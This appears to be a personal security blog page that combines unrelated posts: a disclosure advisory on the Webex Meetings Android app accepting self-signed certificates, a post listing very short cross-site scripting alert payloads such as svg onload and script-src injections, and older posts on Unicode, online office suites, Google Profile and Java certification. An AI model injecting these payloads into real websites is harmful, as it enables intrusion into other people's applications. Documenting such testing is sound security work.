WebEx Meetings are vulnerable to MITM

In my free time, I was looking at some Android applications and noticed that I was able to intercept SSL traffic for Webex Meetings app. When explored it further, I found that Webex Meetings mobile app accepts self-signed certificates. Also there is no certificate pinning enabled.

This makes Webex meet app vulnerable to Man in the middle attack.

Users of this app, if connected to a public Wi-Fi spot, can be targeted by any person on the same network. If connected to a rogue Wi-Fi hotspot, Wi-Fi provider may have access to the data passed from the app to the server. Malwares on the device can also exploit this vulnerability to intercept any sensitive data while it is traveling across the wire.

A proper SSL ensures confidentiality and integrity of the information passed from point A to point B and is very important.
OWASP also puts ‘Insecure Communication’ on 3rd position in their top 10 list for mobile application vulnerabilities.
https://www.owasp.org/index.php/Mobile_Top_10_2016-M3-Insecure_Communication

In simpler terms, if you love connecting to free Wi-Fi hotspots for your Webex meetings, in your gym or coffeeshops, then your meetings may not be not secret anymore.

Vulnerable version:

I tested Webex Meetings Android app, version 10.6.0.21060208 Samsung S8 (on Android version 8.0).
As per vendor’s response, it seems all Webex mobile clients have similar behavior.

Vendor Response :

Hi Pankaj, after discussing with our development team, I’ve learned that the Webex mobile client accepts self-signed certificates because the Webex meetings component also allows for deployments using self-signed certificates. Similarly, because the Webex mobile client has to be used with so many different sites, certificate pinning is also not enabled.

See the documentation: https://www.cisco.com/c/en/us/td/docs/collaboration/CWMS/3_0/Administration_Guide/cwms_b_administration-guide-3-0.html

Page 219 of administrator guide instructs how to import self-signed certificate on mobile device to join meetings. There are also instructions for iOS there as well.

Page 256 of administrator guide instructs certificate management on the meetings server itself, including self-signed certificates.

The guide also mentions that the client warns on accepting the self-signed certificate, and users should make sure the application is genuine before accepting Connect.

These choices are consciously made by the business and documented for customers. As such, we do not consider them vulnerabilities. Although, you are correct, these configurations leave open the possibility of some attacks intended to defeat some SSL protections from attackers with privileged network positions. However, OCSP stapling is enabled as a hardening measure to verify SSL certificates.

Due to requirements of supporting applications using self-signed certificates, the Webex business unit will not make any changes to address your findings. You are of course free to make public your findings. If you do so, please include references to the above documentation.

Thank you again for your reports.

Timeline:

03/10/2018 – Issue reported to Cisco PSIRT
03/10/2018 – Report acknowledged by the incident manager and I was asked for more information
03/10/2018 – Shared the required details. Shared some screenshots from Packet Capture app.
03/27/2018 – I was asked if I could gather more information.
04/10/2018 – I shared some information again.
10/05/2018 – Reached out to the case manager and PSIRT DL for an update. 10/17/2018 – Reached out to PSIRT DL again for an update.
03/13/2019 – Reached out to PSIRT DL again for an update and asking permission for a public disclosure.
03/15/2019 – Got a response that previous case managed had moved on to a different position and also dev team was not able to confirm my report and because of that, there were no fixes.
03/20/2019 – Got the response confirming that Webex mobile clients accept self-signed cert and it is an intended behavior.

04/30/2019 – Requested for a public disclosure as even though Webex suggested they have it in the ‘admin’ documentation, I didn’t think Webex users were aware about the inherent risks.
06/20/2019 – Shared a draft write up with the PSIRT team
06/24/2019 – Released the advisory for the public.

Credits:

No CVE or bounty was awarded as vendor does not consider it a security issue. Vendor credited me for reporting this bug in their public bug release notes.

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvi63354

Update :
Someone pointed out that this issue was previously reported for the iOS app in 2012. CVE for that issue is CVE-2012-6399.

Popping up an XSS alert via a field which does not accept more than 20 characters

While testing an app, a text field on one of the pages, was not accepting more than 20 characters (server side validation). I inserted following piece of code to check XSS (From RSnake’s XSS cheat sheet):

'';!--"<XSS>=&{()}

and verified the HTML source for <XSS verses &lt;XSS . As <XSS was in the HTML source,  the input field was missing output encoding and was vulnerable to cross site scripting.

I was now aiming to get a popup. Only thing was I was used to alert(1) and here I needed a smaller script. I tried to create/find some script which is less than or equal to 20 characters but I was unable to find anything. At that point of time, a random thought came to my mind that, what could be the smallest payload to pop up an alert. I asked this question in IT Security stack-exchange forum. I was also able to make a few payloads myself. Here are those payloads as well as the payload from one of the answer.

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>
<script src=//h4k.me

Update (7th March, 2019)- This is a very old post and may be obsolete now. I guess as someone replied to that question in 2017, following may be the smallest payload to pop up an alert now. I need to check.

<svg/onload=alert()>

ABC of Multibyte Characters….

So how many times you have seen some strange characters in any email or in any web site. How many times as a developer you have seen that your code/ content is getting converted to ‘?’ and users complained.

Previously, internet was limited to english (ASCII) but as soon as it started going global, ASCII was not able to help…..

If you want to read ABC of multibyte characters, ABC of character sets…. read this article written by Joel, one of my favorite writer…

http://www.joelonsoftware.com/articles/Unicode.html

Online Office Suite

Remember the days, when MS Office Suite was a must thing for any office job. I salute to Microsoft for this whole Office idea. and product suite. It definitely was one of the coolest research of that era.

Office suite (but not Microsoft Office) has shifted online now. Kudos to some great work by Google Docs, Zoho, Thinkfree, now you can create your Document, Spread Sheet and Presentation online and can share them with your friends. You along with your friends can simultaneously work on a document or a presentation. This is called as ‘collaboration’.

This whole concept can also be called as SAAS (Software As A Service) because these SAAS vendors will let you use their software as a service as pay per use. You use them without even installing them in your machine so there is no initial requirement of your processor or disk space to run this software which actually is a service.

I use Google Docs and Zoho. Both tools are ultimate and easy to use.

There is also a news of Microsoft entering into this field with its Online MS Office. Adobe has also bought Buzzword which in an online Document creation utility.  Apple has also entered in this market with its iBook which presently works for Apple users only.

So, has anyone left?? All biggies are competing here just to provide you an ultimate experience with their online office suite products.

Are you still on MS Word?? 😛

Google Profile

I always hate to fill a section which is very popularly known as ‘About Me’. How the hell I can type those 1024 or some random number characters, every time I signed up to a new site. Some sites don’t even allow copy paste.

When they can come up with ‘Open Id’ thing, WHY NOT no one thought about ‘About Me’ section…. After all this section is the next important thing after your user id and password.

As if Google was listening, they thought about it and they now allow a user to create a public profile which can be shared with all Google services. Presently it supports only Google Maps and Google Reader but hopefully, in future, they integrate ‘Google profile’ with all the services.

For people, who love to vary their profile information from one site to another, Google can provide an option to not use Google profile but I really liked this idea. This great thought has already helped me to save some of my time. How??

I have already created a Google Profile and love to use it wherever I can. At  least, now I can copy my  ‘About Me’  information and can paste it where ever it is required. For example, I have used the same information in my Blogger Profile and in one of my blogs.

Create yours or see if you have already one 🙂

SCJP 1.6 conquered!!!

I never wanted to write any technical stuff because I know how boring it is! But then I realized what if I can try to tell technical things in very very simplified way. I mean, how I understand technical things, how I realize them and how actually I execute them.

Let me start with my first official certification:

I cleared Sun Certified Java Developer 1.6 on 2nd Feb with 86% marks. I missed 90s and Its ok :).

I will suggest :

1:  Buy a Kathy Sierra/Bert Bates book which has been written for SCJP purpose only.

2: Play this game whenever you are free in your office. I bet you would be 60% of your time :). When you start scoring 100% in these games, you can THINK of being an SUN Certified.

http://www.javaranch.com/game.jsp

http://www.javaranch.com/game/game2.jsp

3: Keep on solving some mock exams and visiting java sites and forums. Mock exams show your grey areas and that is really important. I will suggest to visit JavaBlackBelt, JavaPassion, JavaRanch. Once go through these sites, you will fall in love with them.

http://faq.javaranch.com/java/ScjpMockTests

4:  Most important, learn from sharing. I wasted my few days with Samrat and solved some mock tests together. We challenged each other for the questions and didn’t allow each other to tell any answer without a genuine reason. Strategy worked out and we were quite familiar with Sun’s 1.6 newly added features. Thanks Som 😉